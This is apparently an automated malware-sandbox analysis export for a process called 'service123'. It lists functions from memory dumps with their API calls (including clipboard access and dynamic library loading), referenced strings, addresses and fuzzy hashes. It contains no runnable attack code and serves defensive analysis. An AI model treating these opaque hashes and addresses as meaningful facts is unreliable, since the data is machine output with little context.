Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 6fd147bcdd81372681b9e9ecf7d6a96cabbcbff5eb2908f5958d59d1be79d2f1
Instruction ID: f7f25853815d03c0da6067d56e19ce2185b576556280ec2b5225e78877150cd9
Opcode Fuzzy Hash: 6fd147bcdd81372681b9e9ecf7d6a96cabbcbff5eb2908f5958d59d1be79d2f1
Instruction Fuzzy Hash: 470171F1809208CBC300BFB9A90923D7FF6AB85395F01542DD6898B210EB719418CBA7

Function 6C363DD0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C363E6F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C2FE9CE), ref: 6C363ED3
memmove.MSVCRT ref: 6C363F0B
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C2FE9CE), ref: 6C363F7A

Strings

basic_string::_M_replace, xrefs: 6C3640FF

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 30999bcb636a4ad30f15ef9a2794a99775285afe8fc3a72b2ea471c0070ba4aa
Instruction ID: ace6371f09e09caf7267f56a7da9c1a082f73bac89758bc40c18250ee3dfac47
Opcode Fuzzy Hash: 30999bcb636a4ad30f15ef9a2794a99775285afe8fc3a72b2ea471c0070ba4aa
Instruction Fuzzy Hash: 68910436A093518FC300DF19C09055ABBF1BF89748F15896DE9899BB28E771E944CF92

Function 6C2E7710 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C333320: memset.MSVCRT ref: 6C333365

strcmp.MSVCRT ref: 6C2E7771
strlen.MSVCRT ref: 6C2E778C
strlen.MSVCRT ref: 6C2E77D3
strlen.MSVCRT ref: 6C2E7844
strlen.MSVCRT ref: 6C2E78B2

Strings

@J:l, xrefs: 6C2E77C6, 6C2E78A7
*, xrefs: 6C2E7990

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *$@J:l
API String ID: 3639840916-2751507734
Opcode ID: 19abb4ff3e986fe2958e86abe20b93c18b88ac99769d1582a98a52451b265276
Instruction ID: 19cb8b4b2e177559bae02ea7cd3e78f6e749df0bee08c5ba8b6c742b0c665a78
Opcode Fuzzy Hash: 19abb4ff3e986fe2958e86abe20b93c18b88ac99769d1582a98a52451b265276
Instruction Fuzzy Hash: F1818CB5A056158FDB00DF29C09469DFBF5FF89704F4185ADE884AF711C735A809CB82

Function 6C2CE800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 3fcbb563cea05ec8d63aae953c46d0a8e266610fe407ff37b5c73f59ee5a78f2
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 4E21DA31B5460ECF9780CE19C4D398AB7A5AF86315B548B15EC9447A28D730E88BC7D3

Function 6C2D9BA6 Relevance: 12.1, APIs: 8, Instructions: 86clipboardCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 6C2D9BA9
IsClipboardFormatAvailable.USER32 ref: 6C2D9DDC
OpenClipboard.USER32 ref: 6C2D9DF0

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: Clipboard$AvailableCloseFormatHandleOpen
String ID:
API String ID: 518195572-0
Opcode ID: 7960864c3ee9e5523277cfd87d2176e93cd7705aa0ab4282d81e7c1cedc7695c
Instruction ID: 4a609a090b3aade0eb981328c5a330223446025f72dc6051d5c1f4079cf8e4b0
Opcode Fuzzy Hash: 7960864c3ee9e5523277cfd87d2176e93cd7705aa0ab4282d81e7c1cedc7695c
Instruction Fuzzy Hash: 9A2165B27082058FDB50BF79D5491AEBBF4AB49345F05093AFC8686644EF34E458CB93

Function 006F1E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 006F1EAF
signal.MSVCRT ref: 006F1EF6
signal.MSVCRT ref: 006F1F0F
signal.MSVCRT ref: 006F1F36
signal.MSVCRT ref: 006F1F72
signal.MSVCRT ref: 006F1FBF
signal.MSVCRT ref: 006F1FD5
signal.MSVCRT ref: 006F1FEB

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: c4e26b91273994f54921d134d478279c01b80b9c31351a14086ddcad842712d3
Instruction ID: 7ebd74f884ddd369630d21983979057f54899455cd02b299c0d9690ddd70c294
Opcode Fuzzy Hash: c4e26b91273994f54921d134d478279c01b80b9c31351a14086ddcad842712d3
Instruction Fuzzy Hash: BB3138B0509209CEE7606F64885037EB6D6AB46398F55490DEAC8CF381CB7EC8899B53

Function 6C2D4A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C2D4A48

Strings

@, xrefs: 6C2D4D17
NaN, xrefs: 6C2D540B
Inf, xrefs: 6C2D5505, 6C2D551D

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 82228fce82bacaf9af5ddc048269ab08dd05ac3c422257627539a592cc755323
Instruction ID: 0beb2148b41aeeb9e4be85d76658eb38b608c2b5e06f5e905c6ef3d0afee5432
Opcode Fuzzy Hash: 82228fce82bacaf9af5ddc048269ab08dd05ac3c422257627539a592cc755323
Instruction Fuzzy Hash: A4F1C27160C38A8BD7218F28C49079BBBE1BF95319F168A2DEDDC47781D774A909CB42

Function 006F4360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 006F4378

Strings

NaN, xrefs: 006F4D3B
Inf, xrefs: 006F4E35, 006F4E4D
@, xrefs: 006F4647

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 1825a6cfeb6a5a82832a5290c0b17bd64aa02d619b787abd19012ef7eee22cae
Instruction ID: f4616f24b1a581a33203c3226c79756606022f0a1ac6dc01f039acfef6bc4d4c
Opcode Fuzzy Hash: 1825a6cfeb6a5a82832a5290c0b17bd64aa02d619b787abd19012ef7eee22cae
Instruction Fuzzy Hash: 93F1AE7160C3998BD7309F24C4903BBBBE3BB85314F148A1DEADD97781DB3599068B86

Function 6C2D3830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 6C2D3B96
@, xrefs: 6C2D3AFA

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 099e20724357435e502112e9d3b2b1a029b38eb2134a9fe5d2330303f288f1d3
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: 75C16C71E1461A8BDB04CF6CC48478DBBF1BF99314F2A8259EC94AB789D334E845CB90

Function 006F3160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 006F342A
0, xrefs: 006F34C6

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: d3e8c27e1ffb49b7dc8a1db09b4ddaeb7ad3f32afc48d9bd2769c767034779ca
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: E3C16D72E002698BCB15CF6CC4847ADBBF2BF88314F198259EA54AB345D734EA45CB90

Function 6C2EB810 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2EB836
memcmp.MSVCRT ref: 6C2EB85A
memcmp.MSVCRT ref: 6C2EB8CD
memcmp.MSVCRT ref: 6C2EB93F

Part of subcall function 6C38ADB0: strlen.MSVCRT ref: 6C38ADBE

memcmp.MSVCRT ref: 6C2EB9D7

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2EB881, 6C2EB8F2, 6C2EB965, 6C2EB9FE, 6C2EBA1A
basic_string::compare, xrefs: 6C2EB879, 6C2EB8EA, 6C2EB95D, 6C2EB9F6, 6C2EBA12

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: ad1cdb69a24d5f43951091544e433b297611032c352707630e63ba580b10e603
Instruction ID: 3c824b0daeb2330199dbcc4ff472a5cb0eaf3f60cb287e181ce35576b58f9967
Opcode Fuzzy Hash: ad1cdb69a24d5f43951091544e433b297611032c352707630e63ba580b10e603
Instruction Fuzzy Hash: 916173B660A305AFC300EF69C9C084ABBE9BF88644F55892DF9C8D7710D371E845DB96

Function 6C2CE8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 67cf5a1ac106e8f707f333782c9db40607822d7b6e2ee15321a38c05171f84b4
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: 5C519A7060A70A8FC790DF19C08265AB7E0BF89308F444B5AFC989B654D734D90ACBD7

Function 6C2CE340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2CE487
WaitForSingleObject.KERNEL32 ref: 6C2CE4C8

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 2e219a37ba5c7b91db1baf786ef1e3c24b33dbec306e0c174aab8523f8e2199f
Instruction ID: 1f6de8dd272ea9ad720371b93900f943edef4a4079698b02009702a31791f1dd
Opcode Fuzzy Hash: 2e219a37ba5c7b91db1baf786ef1e3c24b33dbec306e0c174aab8523f8e2199f
Instruction Fuzzy Hash: AB514D707053068BDBA0DF29C5867A677F9BB0A309F104629EC6487781E775E8458BA3

Function 6C2D01F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2D0209
memcpy.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C2D022D
malloc.MSVCRT ref: 6C2D0247
memset.MSVCRT ref: 6C2D0275
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: 0a8132c97a699f9e03fd0048a5ed1700eb66fb872278de0141d1a3301fd6d050
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: 2911C1B26053598FD700BF68D48489AB7E4EF54248F02897DEC49C7B10EB31E418CB61

Function 006F8120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 006F812C
GetProcAddress.KERNEL32 ref: 006F814C
GetProcAddress.KERNEL32 ref: 006F818B

Strings

___lc_codepage_func, xrefs: 006F8144
__lc_codepage, xrefs: 006F8180
msvcrt.dll, xrefs: 006F8125

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 8c153f447ab7da97c886f2b6ea66489503cf3484f8444d1647ea6c4ff1f20422
Instruction ID: b1e223c31bb994645446e4d32e0dcd959fa141f3f1b705474ccc6d7946521947
Opcode Fuzzy Hash: 8c153f447ab7da97c886f2b6ea66489503cf3484f8444d1647ea6c4ff1f20422
Instruction Fuzzy Hash: 7EF06DB49082198F9B00BF7DAD052BB7EE2AA04310F45467EC989C7310EF749445CFA3

Function 6C2D9171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C2D917C
GetProcAddress.KERNEL32 ref: 6C2D919C
GetProcAddress.KERNEL32 ref: 6C2D91DB

Strings

msvcrt.dll, xrefs: 6C2D9175
___lc_codepage_func, xrefs: 6C2D9194
__lc_codepage, xrefs: 6C2D91D0

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: cd536d938215b362377d1d09752f1262b885cb98f1a2cbab25e927c727092637
Instruction ID: 48f24d68fce551dcac4db0abdf3ea81dcdd6d108e5064b440b7d104d3b600cca
Opcode Fuzzy Hash: cd536d938215b362377d1d09752f1262b885cb98f1a2cbab25e927c727092637
Instruction Fuzzy Hash: 07F09CB194520A4BEB007F7C59572897BF4A615215F41453EEC89C7701EA71D431CFA7

Function 6C2CEA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: 0d823b91820cfed0705afd4312bc9541b89c0ed6bd8616a0909adae00f069e30
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: 0BB01232EDA23D8E44A0757C0522080621DAA2738D3055A83DC6E73D089731F04748E3

Function 6C364AE0 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C36B8AE), ref: 6C364B63
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C36B8AE), ref: 6C364BA5

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
